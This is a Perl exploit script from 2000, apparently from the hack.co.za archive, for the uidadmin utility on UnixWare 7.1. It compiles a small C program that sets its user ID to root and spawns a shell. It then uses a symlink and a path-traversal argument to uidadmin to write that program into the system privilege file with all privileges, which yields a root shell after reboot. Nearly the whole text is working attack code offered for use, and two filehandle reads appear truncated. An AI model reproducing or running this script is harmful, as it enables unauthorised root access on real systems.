#!/usr/bin/perl

###########################################################
# /usr/bin/uidadmin exploit for UnixWare 7.1
# Uses a symlink exploit to add our program to a list of elevated privileges
# programs in /etc/security/tcb/privs.  After reboot, /tmp/ui will be added
# to the list of privileged programs.
#
# Format of the privs file is as follows (ctime and size are just as
# st_ctime and st_size as described by stat(2)):
# size:checksum:time:perms:/full/path/to/prog
#
# -Brock Tellier btellier@usa.net
#
###########################################################

$ui_source = "/home/xnec/ui.c";
$ui_dest = "/home/xnec/ui";
$ui_code = "void main() { setreuid(0,0); system(\"/bin/ksh\");}";
$privloc = "/etc/security/tcb/privs";
$uidatafile="/tmp/uidata";
$sumpath = "/usr/bin/sum";
$uidata_sym = "/tmp/uidata.tmp";
$compiler = "cc";
$uidadmin = "/usr/bin/uidadmin";

###
# Path to the directory where your $uidata_sym will exist relative to
# /etc/uidata/
###
$uidadminarg = "../../tmp";


print("\n* uidadmin exploit for UnixWare 7.1 \n\n");

###
# Output $ui_code to $ui_source and compile into $ui_dest
###

open(UIS, ">$ui_source");
printf(UIS "$ui_code\n");
close(UIS);
system ("$compiler -o $ui_dest $ui_source");
if ( -e $ui_dest ) {
   print("\n$ui_dest successfully compiled\n");
}
   else { die "error compiling $ui_dest"; }

###
# stat $ui_dest for size in bytes and ctime (seconds since epoch)
###

$size=(stat($ui_dest))[7] || die "cannot stat $ui_dest";
$ctime=(stat($ui_dest))[10];
print("$ui_dest size=$size ctime=$ctime\n");

###
# get the checksum value for $ui_dest
###

open(SUM, "$sumpath -r $ui_dest|");
$checksum=;
chomp($checksum);
@sumfields=split(' ', $checksum);
$chksum = @sumfields[0];
$chksum =~ s/^0//;

print("$ui_dest checksum is $chksum\n");

###
# Put our entry into $uidatafile, use trailing newline
###

$uidata="$size:$chksum:$ctime:\%fixed,allprivs:$ui_dest";
print("placing '$uidata' into $uidatafile\n");
open(TMP, ">$uidatafile");
print(TMP "$uidata\n");
close(TMP);

###
# Create symlink from $uidata_sym to $privloc
###
symlink($privloc, $uidata_sym);

###
# All the preparation is done, launch the exploit
###

system("$uidadmin -S $uidadminarg -a -r bah");

###
# Find out if the exploit worked, assume it did if $ui_dest is in $privloc
###

open (PRIV, "$privloc");
@privs = ;
foreach $priv (@privs) {
   if ($priv =~ /$ui_dest/) {
      print("Exploit successful. Run $ui_dest after reboot for rootshell\n");
      exit(0);
   }
}
print("Exploit not successful, sorry!\n");
#                 www.hack.co.za           [2000]#